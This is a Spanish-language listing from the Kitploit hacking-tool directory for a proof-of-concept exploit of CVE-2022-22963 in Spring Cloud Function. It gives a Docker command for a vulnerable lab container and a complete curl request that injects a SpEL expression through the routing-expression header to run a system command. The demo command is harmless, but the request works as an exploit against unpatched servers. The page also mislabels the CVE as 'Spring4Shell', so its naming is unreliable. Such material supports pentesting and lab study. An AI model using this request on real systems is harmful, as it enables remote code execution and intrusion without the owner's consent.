Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22963 — Exploit de prueba de concepto para CVE-2022-22963 (Spring4Shell) con un contenedor Docker vulnerable y ejecución remota de código basada en curl a través de expresiones de enrutamiento de Spring Cloud Function. | Kitploit
Herramientas/GitHubGitHub/darryk10/cve-2022-22963
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones Web
GitHubdarryk10/cve-2022-22963

CVE-2022-22963

Exploit de prueba de concepto para CVE-2022-22963 (Spring4Shell) con un contenedor Docker vulnerable y ejecución remota de código basada en curl a través de expresiones de enrutamiento de Spring Cloud Function.

Ver Repositorio
34162hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-22963 - Spring4shell

Para ejecutar la aplicación SpringBoot vulnerable, ejecute este contenedor Docker exponiéndolo al puerto 8080. Ejemplo:

root@kitploit:~
docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Comando Curl:

root@kitploit:~
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

O usando Burp suite:

Burpsuite

Créditos

https://github.com/hktalent/spring-spel-0day-poc

Descargar herramienta